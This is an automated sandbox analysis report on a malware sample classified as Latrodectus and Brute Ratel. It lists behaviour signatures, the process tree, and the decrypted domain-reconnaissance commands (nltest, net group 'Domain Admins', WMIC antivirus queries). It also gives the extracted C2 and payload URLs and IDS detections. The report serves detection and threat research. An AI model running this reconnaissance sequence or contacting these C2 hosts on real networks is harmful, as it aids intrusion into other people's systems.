Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wait.dll.dll

Overview

General Information

Sample name:wait.dll.dll
(renamed file extension from exe to dll)
Original sample name:wait.dll.exe
Analysis ID:1566852
MD5:50bd4ff60c931861e46c801a60f9e916
SHA1:13b14fb516fa726cc5fa9af17a2f93ff49449830
SHA256:f2170f7dc2f97434ef4514ed4272dc8792177038a085f248ba33f9259720afda
Tags:exeTA578user-k3dg3___
Infos:

Detection

BruteRatel, Latrodectus
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected BruteRatel
Yara detected Latrodectus
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks if browser processes are running
Contains functionality to inject threads in other processes
Contains functionality to steal Internet Explorer form passwords
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Performs a network lookup / discovery via net view
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: RunDLL32 Spawning Explorer
Tries to harvest and steal browser information (history, passwords, etc)
Uses ipconfig to lookup or modify the Windows network settings
Uses net.exe to modify the status of services
Uses whoami command line tool to query computer and username
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query network adapater information
Contains functionality to read device registry values (via SetupAPI)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries device information via Setup API
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the current domain controller via net
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 3032 cmdline: loaddll64.exe "C:\Users\user\Desktop\wait.dll.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4836 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 412 cmdline: rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 4084 cmdline: rundll32.exe C:\Users\user\Desktop\wait.dll.dll,Jump MD5: EF3179D498793BF4234F708D3BE28633)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cmd.exe (PID: 3780 cmdline: /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • ipconfig.exe (PID: 4352 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
        • cmd.exe (PID: 4372 cmdline: /c systeminfo MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • systeminfo.exe (PID: 5040 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
            • WmiPrvSE.exe (PID: 3848 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • cmd.exe (PID: 6332 cmdline: /c nltest /domain_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • nltest.exe (PID: 2696 cmdline: nltest /domain_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)
        • cmd.exe (PID: 3424 cmdline: /c nltest /domain_trusts /all_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 1776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • nltest.exe (PID: 4284 cmdline: nltest /domain_trusts /all_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)
        • cmd.exe (PID: 5012 cmdline: /c net view /all /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 2684 cmdline: net view /all /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • cmd.exe (PID: 1216 cmdline: /c net view /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 1896 cmdline: net view /all MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • cmd.exe (PID: 4332 cmdline: /c net group "Domain Admins" /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 5620 cmdline: net group "Domain Admins" /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
            • net1.exe (PID: 6508 cmdline: C:\Windows\system32\net1 group "Domain Admins" /domain MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • WMIC.exe (PID: 4424 cmdline: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2860 cmdline: /c net config workstation MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 5264 cmdline: net config workstation MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
            • net1.exe (PID: 2464 cmdline: C:\Windows\system32\net1 config workstation MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • cmd.exe (PID: 1480 cmdline: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 5756 cmdline: wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • findstr.exe (PID: 4464 cmdline: findstr /V /B /C:displayName MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 3252 cmdline: /c whoami /groups MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • whoami.exe (PID: 1880 cmdline: whoami /groups MD5: A4A6924F3EAF97981323703D38FD99C4)
    • rundll32.exe (PID: 6564 cmdline: rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",Jump MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Brute Ratel C4, BruteRatelBrute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment.This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4
NameDescriptionAttributionBlogpost URLsLink
Latrodectus, LatrodectusFirst discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus

Malware Configuration

Threatname: Latrodectus

{"C2 url": ["https://reateberam.com/test/", "https://dogirafer.com/test/"], "Group Name": "Lambda", "Campaign ID": 3306744842}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.2319042957.000001CEB022C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
    00000003.00000002.4537635408.000001CEB01FE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
      00000006.00000002.4537513322.00000233A000C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
        00000004.00000002.4538291850.0000027619ADC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
          00000004.00000003.2421944396.0000027619B0B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
            Click to see the 10 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: RunDLL32 Spawning Explorer
            Source: Process startedAuthor: elhoim, CD_ROM_: Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\wait.dll.dll,Jump, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 4084, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 1028, ProcessName: explorer.exe
            Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems): Data: Command: net group "Domain Admins" /domain, CommandLine: net group "Domain Admins" /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net group "Domain Admins" /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4332, ParentProcessName: cmd.exe, ProcessCommandLine: net group "Domain Admins" /domain, ProcessId: 5620, ProcessName: net.exe
            Sigma detected: Local Accounts Discovery
            Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: whoami /groups, CommandLine: whoami /groups, CommandLine|base64offset|contains: , Image: C:\Windows\System32\whoami.exe, NewProcessName: C:\Windows\System32\whoami.exe, OriginalFileName: C:\Windows\System32\whoami.exe, ParentCommandLine: /c whoami /groups, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3252, ParentProcessName: cmd.exe, ProcessCommandLine: whoami /groups, ProcessId: 1880, ProcessName: whoami.exe
            Sigma detected: Net.exe Execution
            Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5012, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 2684, ProcessName: net.exe
            Sigma detected: Share And Session Enumeration Using Net.EXE
            Source: Process startedAuthor: Endgame, JHasenbusch (ported for oscd.community): Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5012, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 2684, ProcessName: net.exe
            Sigma detected: Suspicious Network Command
            Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: /c ipconfig /all, CommandLine: /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1028, ParentProcessName: explorer.exe, ProcessCommandLine: /c ipconfig /all, ProcessId: 3780, ProcessName: cmd.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-02T18:44:44.527662+010020283713Unknown Traffic192.168.2.549907172.67.217.190443TCP
            2024-12-02T18:44:47.826069+010020283713Unknown Traffic192.168.2.549916172.67.217.190443TCP
            2024-12-02T18:44:50.122592+010020283713Unknown Traffic192.168.2.549922172.67.217.190443TCP
            2024-12-02T18:44:52.316275+010020283713Unknown Traffic192.168.2.549928172.67.217.190443TCP
            2024-12-02T18:44:54.395713+010020283713Unknown Traffic192.168.2.549934172.67.217.190443TCP
            2024-12-02T18:44:57.622228+010020283713Unknown Traffic192.168.2.549941172.67.217.190443TCP
            2024-12-02T18:45:00.747774+010020283713Unknown Traffic192.168.2.549950172.67.217.190443TCP
            2024-12-02T18:45:06.326721+010020283713Unknown Traffic192.168.2.549962172.67.217.190443TCP
            2024-12-02T18:45:08.104067+010020283713Unknown Traffic192.168.2.549968172.67.217.190443TCP
            2024-12-02T18:45:09.730001+010020283713Unknown Traffic192.168.2.549972104.21.68.89443TCP
            2024-12-02T18:45:13.692035+010020283713Unknown Traffic192.168.2.549980104.21.68.89443TCP
            2024-12-02T18:45:16.944086+010020283713Unknown Traffic192.168.2.549986104.21.68.89443TCP
            2024-12-02T18:45:20.032123+010020283713Unknown Traffic192.168.2.549995104.21.68.89443TCP
            2024-12-02T18:45:23.028620+010020283713Unknown Traffic192.168.2.549999104.21.68.89443TCP
            2024-12-02T18:45:25.999791+010020283713Unknown Traffic192.168.2.550000104.21.68.89443TCP
            2024-12-02T18:45:29.818885+010020283713Unknown Traffic192.168.2.550001104.21.68.89443TCP
            2024-12-02T18:45:32.842132+010020283713Unknown Traffic192.168.2.550002104.21.68.89443TCP
            2024-12-02T18:45:36.271883+010020283713Unknown Traffic192.168.2.550003104.21.68.89443TCP
            2024-12-02T18:45:39.471963+010020283713Unknown Traffic192.168.2.550004104.21.68.89443TCP
            2024-12-02T18:45:42.253111+010020283713Unknown Traffic192.168.2.550005104.21.68.89443TCP
            2024-12-02T18:45:43.549824+010020283713Unknown Traffic192.168.2.550006172.67.217.190443TCP
            2024-12-02T18:45:45.823624+010020283713Unknown Traffic192.168.2.550007172.67.217.190443TCP
            2024-12-02T18:45:48.023397+010020283713Unknown Traffic192.168.2.550008172.67.217.190443TCP
            2024-12-02T18:45:50.330478+010020283713Unknown Traffic192.168.2.550009172.67.217.190443TCP
            2024-12-02T18:45:52.440877+010020283713Unknown Traffic192.168.2.550010172.67.217.190443TCP
            2024-12-02T18:45:54.546398+010020283713Unknown Traffic192.168.2.550011172.67.217.190443TCP
            2024-12-02T18:45:56.708800+010020283713Unknown Traffic192.168.2.550012172.67.217.190443TCP
            2024-12-02T18:45:59.326069+010020283713Unknown Traffic192.168.2.550013172.67.217.190443TCP
            2024-12-02T18:46:01.494128+010020283713Unknown Traffic192.168.2.550014172.67.217.190443TCP
            2024-12-02T18:46:04.165437+010020283713Unknown Traffic192.168.2.550015172.67.217.190443TCP
            2024-12-02T18:46:06.370230+010020283713Unknown Traffic192.168.2.550016172.67.217.190443TCP
            2024-12-02T18:46:08.520945+010020283713Unknown Traffic192.168.2.550017172.67.217.190443TCP
            2024-12-02T18:46:10.558250+010020283713Unknown Traffic192.168.2.550018172.67.217.190443TCP
            2024-12-02T18:46:12.734711+010020283713Unknown Traffic192.168.2.550019172.67.217.190443TCP
            2024-12-02T18:46:14.887791+010020283713Unknown Traffic192.168.2.550020172.67.217.190443TCP
            2024-12-02T18:46:16.974777+010020283713Unknown Traffic192.168.2.550021172.67.217.190443TCP
            2024-12-02T18:46:19.099577+010020283713Unknown Traffic192.168.2.550022172.67.217.190443TCP
            2024-12-02T18:46:21.328328+010020283713Unknown Traffic192.168.2.550023172.67.217.190443TCP
            2024-12-02T18:46:23.410993+010020283713Unknown Traffic192.168.2.550024172.67.217.190443TCP
            2024-12-02T18:46:25.947534+010020283713Unknown Traffic192.168.2.550025172.67.217.190443TCP
            2024-12-02T18:46:28.130666+010020283713Unknown Traffic192.168.2.550026172.67.217.190443TCP
            2024-12-02T18:46:30.327063+010020283713Unknown Traffic192.168.2.550027172.67.217.190443TCP
            2024-12-02T18:46:32.134919+010020283713Unknown Traffic192.168.2.550028172.67.217.190443TCP
            2024-12-02T18:46:33.626933+010020283713Unknown Traffic192.168.2.550029104.21.68.89443TCP
            2024-12-02T18:46:36.554216+010020283713Unknown Traffic192.168.2.550030104.21.68.89443TCP
            2024-12-02T18:46:39.600997+010020283713Unknown Traffic192.168.2.550031104.21.68.89443TCP
            2024-12-02T18:46:42.597580+010020283713Unknown Traffic192.168.2.550032104.21.68.89443TCP
            2024-12-02T18:46:45.533585+010020283713Unknown Traffic192.168.2.550033104.21.68.89443TCP
            2024-12-02T18:46:48.435187+010020283713Unknown Traffic192.168.2.550034104.21.68.89443TCP
            2024-12-02T18:46:51.390038+010020283713Unknown Traffic192.168.2.550035104.21.68.89443TCP
            2024-12-02T18:46:54.473438+010020283713Unknown Traffic192.168.2.550036104.21.68.89443TCP
            2024-12-02T18:46:57.693588+010020283713Unknown Traffic192.168.2.550037104.21.68.89443TCP
            2024-12-02T18:47:00.613180+010020283713Unknown Traffic192.168.2.550038104.21.68.89443TCP
            2024-12-02T18:47:03.676153+010020283713Unknown Traffic192.168.2.550039104.21.68.89443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-02T18:44:44.564697+010020487351A Network Trojan was detected192.168.2.549907172.67.217.190443TCP
            2024-12-02T18:44:48.595493+010020487351A Network Trojan was detected192.168.2.549916172.67.217.190443TCP
            2024-12-02T18:44:50.916155+010020487351A Network Trojan was detected192.168.2.549922172.67.217.190443TCP
            2024-12-02T18:44:53.062424+010020487351A Network Trojan was detected192.168.2.549928172.67.217.190443TCP
            2024-12-02T18:45:07.063591+010020487351A Network Trojan was detected192.168.2.549962172.67.217.190443TCP
            2024-12-02T18:45:12.273213+010020487351A Network Trojan was detected192.168.2.549972104.21.68.89443TCP
            2024-12-02T18:45:15.320865+010020487351A Network Trojan was detected192.168.2.549980104.21.68.89443TCP
            2024-12-02T18:45:18.682230+010020487351A Network Trojan was detected192.168.2.549986104.21.68.89443TCP
            2024-12-02T18:45:21.710515+010020487351A Network Trojan was detected192.168.2.549995104.21.68.89443TCP
            2024-12-02T18:45:23.030742+010020487351A Network Trojan was detected192.168.2.549999104.21.68.89443TCP
            2024-12-02T18:45:27.598658+010020487351A Network Trojan was detected192.168.2.550000104.21.68.89443TCP
            2024-12-02T18:45:31.442221+010020487351A Network Trojan was detected192.168.2.550001104.21.68.89443TCP
            2024-12-02T18:45:34.469924+010020487351A Network Trojan was detected192.168.2.550002104.21.68.89443TCP
            2024-12-02T18:45:37.896126+010020487351A Network Trojan was detected192.168.2.550003104.21.68.89443TCP
            2024-12-02T18:45:41.079743+010020487351A Network Trojan was detected192.168.2.550004104.21.68.89443TCP
            2024-12-02T18:45:44.395556+010020487351A Network Trojan was detected192.168.2.550006172.67.217.190443TCP
            2024-12-02T18:45:46.753159+010020487351A Network Trojan was detected192.168.2.550007172.67.217.190443TCP
            2024-12-02T18:45:48.761904+010020487351A Network Trojan was detected192.168.2.550008172.67.217.190443TCP
            2024-12-02T18:45:51.126064+010020487351A Network Trojan was detected192.168.2.550009172.67.217.190443TCP
            2024-12-02T18:45:53.206186+010020487351A Network Trojan was detected192.168.2.550010172.67.217.190443TCP
            2024-12-02T18:45:55.328247+010020487351A Network Trojan was detected192.168.2.550011172.67.217.190443TCP
            2024-12-02T18:45:57.918742+010020487351A Network Trojan was detected192.168.2.550012172.67.217.190443TCP
            2024-12-02T18:46:00.102210+010020487351A Network Trojan was detected192.168.2.550013172.67.217.190443TCP
            2024-12-02T18:46:02.173598+010020487351A Network Trojan was detected192.168.2.550014172.67.217.190443TCP
            2024-12-02T18:46:04.861845+010020487351A Network Trojan was detected192.168.2.550015172.67.217.190443TCP
            2024-12-02T18:46:07.192105+010020487351A Network Trojan was detected192.168.2.550016172.67.217.190443TCP
            2024-12-02T18:46:09.276616+010020487351A Network Trojan was detected192.168.2.550017172.67.217.190443TCP
            2024-12-02T18:46:11.316318+010020487351A Network Trojan was detected192.168.2.550018172.67.217.190443TCP
            2024-12-02T18:46:13.425645+010020487351A Network Trojan was detected192.168.2.550019172.67.217.190443TCP
            2024-12-02T18:46:15.589493+010020487351A Network Trojan was detected192.168.2.550020172.67.217.190443TCP
            2024-12-02T18:46:17.727919+010020487351A Network Trojan was detected192.168.2.550021172.67.217.190443TCP
            2024-12-02T18:46:19.944752+010020487351A Network Trojan was detected192.168.2.550022172.67.217.190443TCP
            2024-12-02T18:46:22.035396+010020487351A Network Trojan was detected192.168.2.550023172.67.217.190443TCP
            2024-12-02T18:46:24.186416+010020487351A Network Trojan was detected192.168.2.550024172.67.217.190443TCP
            2024-12-02T18:46:26.713257+010020487351A Network Trojan was detected192.168.2.550025172.67.217.190443TCP
            2024-12-02T18:46:28.812293+010020487351A Network Trojan was detected192.168.2.550026172.67.217.190443TCP
            2024-12-02T18:46:31.036084+010020487351A Network Trojan was detected192.168.2.550027172.67.217.190443TCP
            2024-12-02T18:46:35.226518+010020487351A Network Trojan was detected192.168.2.550029104.21.68.89443TCP
            2024-12-02T18:46:38.187916+010020487351A Network Trojan was detected192.168.2.550030104.21.68.89443TCP
            2024-12-02T18:46:41.249251+010020487351A Network Trojan was detected192.168.2.550031104.21.68.89443TCP
            2024-12-02T18:46:44.202517+010020487351A Network Trojan was detected192.168.2.550032104.21.68.89443TCP
            2024-12-02T18:46:47.148498+010020487351A Network Trojan was detected192.168.2.550033104.21.68.89443TCP
            2024-12-02T18:46:50.020040+010020487351A Network Trojan was detected192.168.2.550034104.21.68.89443TCP
            2024-12-02T18:46:53.129087+010020487351A Network Trojan was detected192.168.2.550035104.21.68.89443TCP
            2024-12-02T18:46:56.061048+010020487351A Network Trojan was detected192.168.2.550036104.21.68.89443TCP
            2024-12-02T18:46:59.093190+010020487351A Network Trojan was detected192.168.2.550037104.21.68.89443TCP
            2024-12-02T18:47:02.283970+010020487351A Network Trojan was detected192.168.2.550038104.21.68.89443TCP
            2024-12-02T18:47:05.405551+010020487351A Network Trojan was detected192.168.2.550039104.21.68.89443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-02T18:44:56.200694+010020180521A Network Trojan was detected192.168.2.549934172.67.217.190443TCP
            2024-12-02T18:44:59.451375+010020180521A Network Trojan was detected192.168.2.549941172.67.217.190443TCP
            2024-12-02T18:45:02.909131+010020180521A Network Trojan was detected192.168.2.549950172.67.217.190443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-02T18:44:56.200694+010028032742Potentially Bad Traffic192.168.2.549934172.67.217.190443TCP
            2024-12-02T18:45:02.909131+010028032742Potentially Bad Traffic192.168.2.549950172.67.217.190443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://reateberam.com/test/1303063_94378682313560_2056837URLS1https://dogirafer.com/test/4190877_54Avira URL Cloud: Label: malware
            Source: https://reateberam.com/test/Avira URL Cloud: Label: malware
            Source: https://reateberam.com/test/4560DAvira URL Cloud: Label: malware
            Source: https://reateberam.com/test/9362058_57969102112118_633157URLS1https://dogirafer.com/test/8477611_767Avira URL Cloud: Label: malware
            Source: https://reateberam.com/test/t60GAvira URL Cloud: Label: malware
            Source: https://reateberam.com/test/XAvira URL Cloud: Label: malware
            Source: https://reateberam.com/Avira URL Cloud: Label: malware
            Source: https://reateberam.com/test/wAvira URL Cloud: Label: malware
            Source: https://reateberam.com/files/stkm.binoAvira URL Cloud: Label: malware
            Source: https://reateberam.com/qAvira URL Cloud: Label: malware
            Source: https://reateberam.com/files/stkm.binAvira URL Cloud: Label: malware
            Source: https://reateberam.com/test/4439042_94940942440575_5318539URLS1https://dogirafer.com/test/3185439_50Avira URL Cloud: Label: malware
            Source: https://reateberam.com/test/4560Avira URL Cloud: Label: malware
            Source: https://reateberam.com/files/stkm.binSLAvira URL Cloud: Label: malware
            Source: https://reateberam.com/test/3630449_22862766669148_5703346URLS1https://dogirafer.com/test/6092916_19Avira URL Cloud: Label: malware
            Source: https://reateberam.com/pAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 8.2.explorer.exe.3030000.0.unpackMalware Configuration Extractor: Latrodectus {"C2 url": ["https://reateberam.com/test/", "https://dogirafer.com/test/"], "Group Name": "Lambda", "Campaign ID": 3306744842}
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Sample uses string decryption to hide its real strings
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: /c ipconfig /all
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: /c systeminfo
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: /c nltest /domain_trusts
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: /c net view /all
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: /c nltest /domain_trusts /all_trusts
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: /c net view /all /domain
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: &ipconfig=
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: /c net group "Domain Admins" /domain
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
            Source: 8.2.explorer.exe.3030000.0.unpackString decryptor: C:\Windows\System32\wbem\wmic.exe
